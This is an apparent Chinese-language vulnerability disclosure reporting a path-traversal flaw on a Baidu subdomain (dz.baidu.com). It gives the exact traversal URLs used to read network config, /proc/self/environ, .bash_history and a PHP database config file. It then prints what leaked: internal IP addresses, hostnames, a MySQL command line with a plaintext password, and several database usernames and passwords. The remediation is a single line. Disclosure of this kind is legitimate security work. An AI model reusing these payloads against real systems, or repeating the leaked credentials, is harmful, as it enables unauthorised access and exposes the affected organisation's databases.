百度某站点任意文件遍历(泄漏多个数据库帐号密码)

http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/sysconfig/network-scripts/ifcfg-eth1
可以读取任意本地文件。

DEVICE=eth1
BOOTPROTO=static
IPADDR=10.26.186.23
NETMASK=255.255.255.0
ONBOOT=yes
得到IP地址是10.26.186.23。再读取/proc/self/environ:
MANPATH=:/usr/share/baidu/man
HOSTNAME=tc-dev-light01.tc.baidu.com
TERM=linux
SHELL=/bin/bash
HISTSIZE=1000
SSH_CLIENT=10.48.50.43 43745 22
SSH_TTY=/dev/pts/0
USER=work
LD_LIBRARY_PATH=/home/op/opbin/optool/lib:
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
SUDO_USER=zhaojianqi
SUDO_UID=194560
OPHOME=/home/op
OPTOOL=/home/op/opbin/optool
MAIL=/var/spool/mail/zhaojianqi
PATH=/home/op/opbin/optool/bin:/home/op/opbin/optool/bin:/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/share/baidu/bin:/opt/bin:/home/opt/bin:/DoorGod/bin:/opt/bin:/home/opt/bin
PWD=/home/work/php/sbin
INPUTRC=/etc/inputrc
EDITOR=vim
LANG=en_US
SUDO_COMMAND=/bin/bash
SHLVL=5
HOME=/home/work
LOGNAME=work
SSH_CONNECTION=10.48.50.43 43745 10.26.186.13 22
LESSOPEN=|/usr/bin/lesspipe.sh %s
PKG_CONFIG_PATH=/home/op/opbin/optool/lib/pkgconfig:/home/op/opbin/optool/lib/pkgconfig:
SUDO_GID=100000
G_BROKEN_FILENAMES=1
_=/home/work/php/bin/php-cgi
FPM_SOCKETS=/home/work/php/tmp/php-fpm.sock
得到主机名： HOSTNAME=tc-dev-light01.tc.baidu.com。.bash_history文件是存在的：
http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/.bash_history
历史命令泄漏了MySQL密码：
/home/work/mysql/bin/mysql -hsh01-dba-chunlei-lapp-01.sh01 -P5100 -pGOGZ7Wpr8wrjHS6g -Dlightpay -ulightpay_r  --default-character-set=utf8
源代码中还泄漏了数据库配置信息，有较多的数据库密码：
http://dz.baidu.com/en/..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/home/work/phpui/conf/bdDBProxyConfig.class.php
  /**
     * DBProxy集群的机器列表、访问集群时所用的用户名、密码、端口号、失败重试次数
     * @var array
     */
    static $arrDBProxyServer = array(
        self::DBPROXY_OPENPLATFORM_INDEX => array(    //open-platform dbproxy集群
            'username' => 'developer_w',
            'password' => 'v60KOStx8cMQrv60',
            'port' => 6014,
            'jx' => array(
                '10.46.7.20',
                '10.46.7.20',
            ),
            'tc' => array(
                '10.42.8.18',
                '10.42.8.18',
            ),
        ),
        self::DBPROXY_OPENPLATFORM_READONLY_INDEX => array(  //open-platform dbproxy集群
            'username' => 'openplatform_r',
            'password' => 'oY3DHhmW1BFfkUYy',
            'port' => 5352,
            'jx' => array(
                '10.202.95.49',
            ),
            'tc' => array(
                '10.202.95.49',
            ),
        ),
其余省略
解决方案：
正确处理path